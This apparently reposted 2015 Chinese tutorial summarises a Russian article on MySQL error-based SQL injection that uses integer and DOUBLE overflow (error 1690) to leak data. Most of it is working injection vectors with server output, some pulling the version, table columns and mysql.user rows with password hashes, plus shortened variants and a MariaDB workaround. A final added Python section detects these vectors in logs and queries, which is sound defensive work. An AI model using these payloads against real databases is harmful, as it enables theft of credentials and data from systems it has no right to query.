
A new type of MySQL error-based injection - Website Security - 自学php

Source: 自学PHP网    Date: 2015-04-15 15:00


The original article is in Russian and is hard to translate, so here is a rough summary of its contents:

This kind of error-based injection relies mainly on MySQL data type overflow: when an arithmetic result leaves the BIGINT range, the server raises error 1690 and echoes the offending expression back in the error message.

mysql> SELECT 18446744073709551610 * 2;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'
mysql> SELECT -1 * 9223372036854775808;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(-(1) * 9223372036854775808)'

Querying the database version:

mysql> SELECT 2 * (if((SELECT * from (SELECT (version())) s), 18446744073709551610, 18446744073709551610));
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select '5.5' from dual),18446744073709551610,18446744073709551610))'

Both branches of if() return the same overflowing value, so the error fires regardless of the condition, and the message prints the evaluated subquery ('5.5') in place of the subquery itself.

Retrieving column names:

mysql> SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` AS `article`,`test`.`shop`.`dealer` AS `dealer`,`test`.`shop`.`price` AS `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610))'
// Learn the column names of the table

Retrieving column values:

mysql> SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'localhost','root','*','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','','0','0','0','0','','' from dual limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),18446744073709551610,18446744073709551610))'

Note that this method does not work on older MySQL versions. You also need to know the length limit of error messages, because it determines how much data a single error message can carry:

mysys/my_error.c
/* Max length of a error message. Should be kept in sync with MYSQL_ERRMSG_SIZE. */
#define ERRMSGSIZE (512)

If the target is MariaDB (a fork of MySQL), trying the method above may give you an error message like this:

mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610));
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select #),18446744073709551610,18446744073709551610))'

MariaDB prints the subquery as # instead of its evaluated value, so the version string does not appear in the message.

As a workaround, the problem can be handled this way:

mysql> SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a;
ERROR 1690 (22003): BIGINT value is out of range in '(('5.5-MariaDB' is not null) - -(9223372036854775808))'

Now let's see whether the vectors can be made shorter. The shorter forms multiply 1E308 by 2, which overflows DOUBLE instead of BIGINT, but the error message still echoes the expression.

// Querying the database version

SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610))
= select 1E308*if((select*from(select version())x),2,2)

SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a
= select if(x,2,2)*1E308 from(select version()x)y

// Retrieving table column names

SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610)
= select 1E308*if((select*from(select*from mysql.user)``limit 1)>(select*from mysql.user limit 1),2,2)

// Retrieving column values

SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610)
= select 1E308*if((select*from(select*from mysql.user LIMIT 1)``limit 1)<(select*from mysql.user limit 0),2,2)

// Retrieving the values of specific columns

select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)

// Retrieving the column count

select 1E308*if((select*from mysql.user limit 1)>(select 1),2,2)

Some other variants:

SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (version())i)a

select 1E308*if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2);
=> select 2*if((select user|host|password|file_priv from(select*from mysql.user LIMIT 1)a limit 1),1e308,0);

mysql> select (select * from mysql.user)=1;
mysql> select (select * from mysql.user)in(1);
ERROR 1241 (21000): Operand should contain 42 column(s)

select if((select user||host||password||file_priv from(select*from mysql.user LIMIT 1)a limit 1),2,2)*1E308

select (x!=0x00)--9223372036854775808 from(SELECT version()x)y

mysql> select!x-~0.FROM(select+user()x)f;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'



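As an added detection example (not code from the original article), the following Python scans constructed application log lines for error 1690 messages whose echoed expression carries evaluated data, and checks query text for the indicators shared by every vector above: the sentinel constants (18446744073709551610, 9223372036854775808, 1E308, ~0), a subquery used as the if() condition, and reads of mysql.user. It covers both the long vectors and the shortened ones; the log format, function names and verdict labels are assumptions made here.

```python
import re

# Added example, not code from the article: flags the overflow error-based injection
# vectors shown above in constructed log lines. Names and log format are assumptions.

# Constants the vectors rely on: the BIGINT boundaries, 1E308 for the DOUBLE form, ~0.
OVERFLOW_SENTINELS = re.compile(
    r"18446744073709551610|9223372036854775808|\b1e308\b|~0\b", re.IGNORECASE)
# A subquery placed directly in the condition of if(), as in every vector above.
SUBQUERY_AS_CONDITION = re.compile(r"\bif\s*\(\s*\(*\s*select\b", re.IGNORECASE)
SENSITIVE_TABLE = re.compile(r"\bmysql\.user\b", re.IGNORECASE)
# The server error the technique depends on; group 2 is the echoed expression.
ERROR_1690 = re.compile(
    r"ERROR 1690 \(22003\): (BIGINT(?: UNSIGNED)?|DOUBLE) value is out of range in '(.*)'")

def query_indicators(query):
    """Return the overflow-injection indicators present in a query text (empty if none)."""
    found = []
    if OVERFLOW_SENTINELS.search(query):
        found.append("overflow sentinel constant")
    if SUBQUERY_AS_CONDITION.search(query):
        found.append("subquery used as if() condition")
    if SENSITIVE_TABLE.search(query):
        found.append("reads mysql.user")
    return found

def classify_error_line(line):
    """None if the line is not error 1690; "leak" if the echoed expression carries
    evaluated data (a quoted string or backticked column names, as in the outputs
    above); otherwise "overflow" for a plain arithmetic overflow."""
    m = ERROR_1690.search(line)
    if not m:
        return None
    data_echoed = re.search(r"'[^']*'|`[^`]+`", m.group(2)) is not None
    return "leak" if data_echoed else "overflow"

def scan_log(lines):
    """Return (line number, verdict) for every error 1690 line in the log."""
    verdicts = ((n, classify_error_line(l)) for n, l in enumerate(lines, 1))
    return [(n, v) for n, v in verdicts if v]

# Constructed sample: an application log that records the database's error text verbatim.
SAMPLE_LOG = [
    "2015-04-15 15:00:01 app db-error: ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'",
    "2015-04-15 15:00:02 app db-error: ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select '5.5' from dual),18446744073709551610,18446744073709551610))'",
    "2015-04-15 15:00:03 app db-error: ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'",
    "2015-04-15 15:00:04 app info: user login ok",
]
```

A "leak" verdict means the database's error text reached the log with evaluated data inside it, which is the condition this technique needs; a plain "overflow" is the same server error without echoed data.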
Some readers report that they tried this without success and are waiting for confirmation... A screenshot is attached.